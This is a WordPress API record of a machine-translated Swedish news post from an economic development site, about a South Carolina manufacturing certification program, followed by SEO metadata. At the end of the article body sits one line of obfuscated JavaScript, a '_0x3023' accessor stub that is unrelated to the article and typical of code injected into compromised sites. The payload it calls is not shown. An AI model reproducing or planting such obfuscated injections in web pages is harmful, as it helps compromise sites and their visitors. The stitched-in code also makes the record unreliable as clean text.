{"id":8988,"date":"2020-10-28T16:33:00","date_gmt":"2020-10-28T16:33:00","guid":{"rendered":"http:\/\/alliancepickens.com\/2020\/10\/28\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\/"},"modified":"2021-07-21T23:23:32","modified_gmt":"2021-07-21T23:23:32","slug":"uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning","status":"publish","type":"post","link":"https:\/\/alliancepickens.com\/sv\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\/","title":{"rendered":"Uppfr\u00e4schade tekniska program ger kompetensutbildning f\u00f6r lokala industrier &#8211; Seneca Tidning"},"content":{"rendered":"<p>Av Greg Oliver<br \/>\nPENDLETON \u2014 N\u00e4r Tristan Worley f\u00f6rlorade sitt jobb, medger han att det blev lite skr\u00e4mmande.<br \/>\n&#8220;Jag letade efter ett s\u00e4tt att f\u00f6rs\u00f6rja min familj,&#8221; Worley sa. &#8220;Jag var ans\u00f6ker \u00f6verallt jag kunde, men de flesta var temp tj\u00e4nster som var l\u00e5g betalande.&#8221;<br \/>\nWorley deltog i en jobbm\u00e4ssa p\u00e5 Tri-County Technical College och l\u00e4rde sig om ett stipendium tillf\u00e4lle. Klassen var en veckas arbetsberedskapsutbildning och en blandning av branschbaserade baskompetensutbildningsmoduler och arbetslivserfarenhet p\u00e5 lokala branscher.<br \/>\nWorley anst\u00e4lldes som produktionstekniker p\u00e5 U.S. Engine Valve i Westminster tv\u00e5 veckor innan han avslutade klassen och s\u00f6ker nu sin industriella elektronikexamen fr\u00e5n Tech.<br \/>\n&#8220;De \u00e4r ett bra f\u00f6retag och erbjuder en hel del anst\u00e4llningstrygghet,&#8221; Worley sa. &#8220;Jag ville ha ett f\u00f6retag som ser efter sitt folk och det \u00e4r som familj och en massa m\u00e4nniskor har uppn\u00e5tt 15 \u00e5r perfekt n\u00e4rvaro. De vill vara d\u00e4r.&#8221;<br \/>\nMedan programmet f\u00f6r\u00e4ndrat Worley liv till det b\u00e4ttre, de m\u00e4nniskor som arbetar med dess utveckling har f\u00f6rnyat programmet med ett nytt namn &#8211; South Carolina Manufacturing Certification program &#8211; samt f\u00f6rb\u00e4ttra vad som erbjuds f\u00f6r studenter.<br \/>\nUnder en torsdag morgon frukost som h\u00f6lls p\u00e5 h\u00f6gskolan, tj\u00e4nstem\u00e4n som uppgifter om f\u00f6r\u00e4ndringarna. F\u00f6rb\u00e4ttringarna inkluderade att komplettera l\u00e4roplanen med ytterligare komponenter och certifieringar \u2013 inklusive OSHA, Six Sigma och Snap-On \u2013 och att anv\u00e4nda praktiska simuleringar f\u00f6r att \u00f6ka elevernas f\u00f6rst\u00e5else f\u00f6r moderna tillverkningsprocesser.<br \/>\nTj\u00e4nstem\u00e4n s\u00e4ger att l\u00e4roplanen \u00e4ndringar har utformats f\u00f6r att ge lokala industrier med en pipeline av skickliga nyb\u00f6rjar operat\u00f6rer.<br \/>\n&#8220;En av anledningarna till att m\u00e4nniskor inte har jobb \u00e4r bristen p\u00e5 skicklighet&#8221;, s\u00e4ger Richard Parker, programchef f\u00f6r Center for Workforce Excellence p\u00e5 Tech. &#8220;South Carolina ligger f\u00f6re nationen genom att utbilda m\u00e4nniskor som redan \u00e4r d\u00e4r eller kommer genom d\u00f6rren genom l\u00e4rlingsplatser.&#8221;<br \/>\nSCMC \u00e4r en 200-timmars l\u00e4roplan som inneh\u00e5ller m\u00f6jligheten att tj\u00e4na \u00e5tta nationellt erk\u00e4nda certifieringar. \u00c4mnen inkluderar industriell s\u00e4kerhet, kvalitet, ritningar och m\u00e4tning, produktionsprocesser och viss grundl\u00e4ggande f\u00f6rst\u00e5else f\u00f6r industriell utrustning och underh\u00e5ll.<br \/>\nDeltagarna \u00e4r ocks\u00e5 skyldiga att ha en gymnasieexamen eller GED och en Silver Career Readiness Certificate intj\u00e4nade genom att ta ACT WorkKeys bed\u00f6mningar, som ocks\u00e5 erbjuds gratis. Den f\u00f6rsta SCMC 10-veckorsklassen har f\u00f6r n\u00e4rvarande 11 personer och de som slutf\u00f6r programmet f\u00e5r en autentiseringsuppgifter som uppfyller branschstandarder.<br \/>\nWhitlock sade varje South Carolina f\u00f6retag som registrerar en l\u00e4rling kommer att f\u00e5 en $ 1.000 skatteavdrag &nbsp; per \u00e5r i upp till fyra \u00e5r, vilket bidrar till att kompensera utbildningskostnader.<br \/>\nMary Ann Craft, personalchef f\u00f6r US Engine Valve, som syssels\u00e4tter cirka 400 totalt, sade anl\u00e4ggningen s\u00f6ker kvalificerad arbetskraft, men har inte monteringsarbete att erbjuda.<br \/>\n&#8220;Det \u00e4r alla maskinister och vad detta program g\u00f6r \u00e4r att f\u00f6ra m\u00e4nniskor som Tristan som har lust att till\u00e4mpa sig f\u00f6r utbildning,&#8221; Craft sa. Hon sa Worley arbetar nu heltid samtidigt som han s\u00f6ker sin examen, som finansieras av anl\u00e4ggningen.<br \/>\n&#8220;Vi har stora planer f\u00f6r honom,&#8221; Craft sa. &#8220;Vi vill se honom flytta in i tillverkning och tekniska omr\u00e5den.&#8221;<br \/>\nDe b\u00e4sta ekonomiska cheferna f\u00f6r Oconee och Pickens l\u00e4n, som ocks\u00e5 var n\u00e4rvarande vid frukosten, sade den f\u00f6rnyade certifieringsprogram \u00e4r sp\u00e4nnande nyheter.<br \/>\n&#8220;En av de viktigaste instrumenten som driver den ekonomiska utvecklingen \u00e4r att ha kompetens p\u00e5 plats f\u00f6r tillverkning jobb,&#8221; s\u00e4ger Oconee County ekonomisk utveckling direkt\u00f6r Richard Blackwell. &#8220;Vi k\u00e4nner att detta \u00e4r n\u00e4sta kapitel f\u00f6r ekonomisk utveckling i Oconee County.&#8221;<br \/>\nAlliance Pickens verkst\u00e4llande direkt\u00f6r Ray Farley sade SCMC kommer att vara &#8220;ett v\u00e4rdefullt verktyg f\u00f6r v\u00e5ra befintliga industrier och nyrekryterade industrier.&#8221;<br \/>\n&#8220;Kompetenstillg\u00e4nglighet \u00e4r en premie p\u00e5 v\u00e5r marknad och detta program kommer att ge ett ben upp f\u00f6r att f\u00f6rb\u00e4ttra kompetensutveckling f\u00f6r att tillfredsst\u00e4lla marknaden,&#8221; Farley sa.<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Av Greg Oliver PENDLETON \u2014 N\u00e4r Tristan Worley f\u00f6rlorade sitt jobb, medger han att det blev lite skr\u00e4mmande. &#8220;Jag letade efter ett s\u00e4tt att f\u00f6rs\u00f6rja min familj,&#8221; Worley sa. &#8220;Jag var ans\u00f6ker \u00f6verallt jag kunde, men de flesta var temp tj\u00e4nster som var l\u00e5g betalande.&#8221; Worley deltog i en jobbm\u00e4ssa p\u00e5 Tri-County Technical College och&hellip;<\/p>\n","protected":false},"author":8,"featured_media":5105,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[56],"tags":[],"class_list":["post-8988","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news-sv","category-56","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Uppfr\u00e4schade tekniska program ger kompetensutbildning f\u00f6r lokala industrier - Seneca Tidning - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/sv\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\/\" \/>\n<meta property=\"og:locale\" content=\"sv_SE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Uppfr\u00e4schade tekniska program ger kompetensutbildning f\u00f6r lokala industrier - Seneca Tidning - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"Av Greg Oliver PENDLETON \u2014 N\u00e4r Tristan Worley f\u00f6rlorade sitt jobb, medger han att det blev lite skr\u00e4mmande. &#8220;Jag letade efter ett s\u00e4tt att f\u00f6rs\u00f6rja min familj,&#8221; Worley sa. &#8220;Jag var ans\u00f6ker \u00f6verallt jag kunde, men de flesta var temp tj\u00e4nster som var l\u00e5g betalande.&#8221; Worley deltog i en jobbm\u00e4ssa p\u00e5 Tri-County Technical College och&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/sv\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:published_time\" content=\"2020-10-28T16:33:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-07-21T23:23:32+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"990\" \/>\n\t<meta property=\"og:image:height\" content=\"618\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"AP Transfer\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"AP Transfer\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\\\/\"},\"author\":{\"name\":\"AP Transfer\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\"},\"headline\":\"Uppfr\u00e4schade tekniska program ger kompetensutbildning f\u00f6r lokala industrier &#8211; Seneca Tidning\",\"datePublished\":\"2020-10-28T16:33:00+00:00\",\"dateModified\":\"2021-07-21T23:23:32+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\\\/\"},\"wordCount\":750,\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"articleSection\":[\"News\"],\"inLanguage\":\"sv-SE\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\\\/\",\"name\":\"Uppfr\u00e4schade tekniska program ger kompetensutbildning f\u00f6r lokala industrier - Seneca Tidning - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"datePublished\":\"2020-10-28T16:33:00+00:00\",\"dateModified\":\"2021-07-21T23:23:32+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\\\/#breadcrumb\"},\"inLanguage\":\"sv-SE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"sv-SE\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\\\/#primaryimage\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"contentUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"width\":990,\"height\":618,\"caption\":\"Alliance Pickens Logo\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Uppfr\u00e4schade tekniska program ger kompetensutbildning f\u00f6r lokala industrier &#8211; Seneca Tidning\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"sv-SE\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\",\"name\":\"AP Transfer\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"sv-SE\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"caption\":\"AP Transfer\"},\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/author\\\/aptransfer\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Uppfr\u00e4schade tekniska program ger kompetensutbildning f\u00f6r lokala industrier - Seneca Tidning - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/sv\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\/","og_locale":"sv_SE","og_type":"article","og_title":"Uppfr\u00e4schade tekniska program ger kompetensutbildning f\u00f6r lokala industrier - Seneca Tidning - Alliance Pickens","og_description":"Av Greg Oliver PENDLETON \u2014 N\u00e4r Tristan Worley f\u00f6rlorade sitt jobb, medger han att det blev lite skr\u00e4mmande. &#8220;Jag letade efter ett s\u00e4tt att f\u00f6rs\u00f6rja min familj,&#8221; Worley sa. &#8220;Jag var ans\u00f6ker \u00f6verallt jag kunde, men de flesta var temp tj\u00e4nster som var l\u00e5g betalande.&#8221; Worley deltog i en jobbm\u00e4ssa p\u00e5 Tri-County Technical College och&hellip;","og_url":"https:\/\/alliancepickens.com\/sv\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\/","og_site_name":"Alliance Pickens","article_published_time":"2020-10-28T16:33:00+00:00","article_modified_time":"2021-07-21T23:23:32+00:00","og_image":[{"width":990,"height":618,"url":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","type":"image\/jpeg"}],"author":"AP Transfer","twitter_card":"summary_large_image","twitter_misc":{"Written by":"AP Transfer","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/alliancepickens.com\/sv\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\/#article","isPartOf":{"@id":"https:\/\/alliancepickens.com\/sv\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\/"},"author":{"name":"AP Transfer","@id":"https:\/\/alliancepickens.com\/sv\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01"},"headline":"Uppfr\u00e4schade tekniska program ger kompetensutbildning f\u00f6r lokala industrier &#8211; Seneca Tidning","datePublished":"2020-10-28T16:33:00+00:00","dateModified":"2021-07-21T23:23:32+00:00","mainEntityOfPage":{"@id":"https:\/\/alliancepickens.com\/sv\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\/"},"wordCount":750,"image":{"@id":"https:\/\/alliancepickens.com\/sv\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\/#primaryimage"},"thumbnailUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","articleSection":["News"],"inLanguage":"sv-SE"},{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/sv\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\/","url":"https:\/\/alliancepickens.com\/sv\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\/","name":"Uppfr\u00e4schade tekniska program ger kompetensutbildning f\u00f6r lokala industrier - Seneca Tidning - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/sv\/#website"},"primaryImageOfPage":{"@id":"https:\/\/alliancepickens.com\/sv\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\/#primaryimage"},"image":{"@id":"https:\/\/alliancepickens.com\/sv\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\/#primaryimage"},"thumbnailUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","datePublished":"2020-10-28T16:33:00+00:00","dateModified":"2021-07-21T23:23:32+00:00","author":{"@id":"https:\/\/alliancepickens.com\/sv\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01"},"breadcrumb":{"@id":"https:\/\/alliancepickens.com\/sv\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\/#breadcrumb"},"inLanguage":"sv-SE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/sv\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\/"]}]},{"@type":"ImageObject","inLanguage":"sv-SE","@id":"https:\/\/alliancepickens.com\/sv\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\/#primaryimage","url":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","contentUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","width":990,"height":618,"caption":"Alliance Pickens Logo"},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/sv\/uppfraschade-tekniska-program-ger-kompetensutbildning-for-lokala-industrier-seneca-tidning\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/sv\/"},{"@type":"ListItem","position":2,"name":"Uppfr\u00e4schade tekniska program ger kompetensutbildning f\u00f6r lokala industrier &#8211; Seneca Tidning"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/sv\/#website","url":"https:\/\/alliancepickens.com\/sv\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/sv\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"sv-SE"},{"@type":"Person","@id":"https:\/\/alliancepickens.com\/sv\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01","name":"AP Transfer","image":{"@type":"ImageObject","inLanguage":"sv-SE","@id":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","caption":"AP Transfer"},"url":"https:\/\/alliancepickens.com\/sv\/author\/aptransfer\/"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/posts\/8988","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/comments?post=8988"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/posts\/8988\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/media\/5105"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/media?parent=8988"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/categories?post=8988"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/tags?post=8988"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}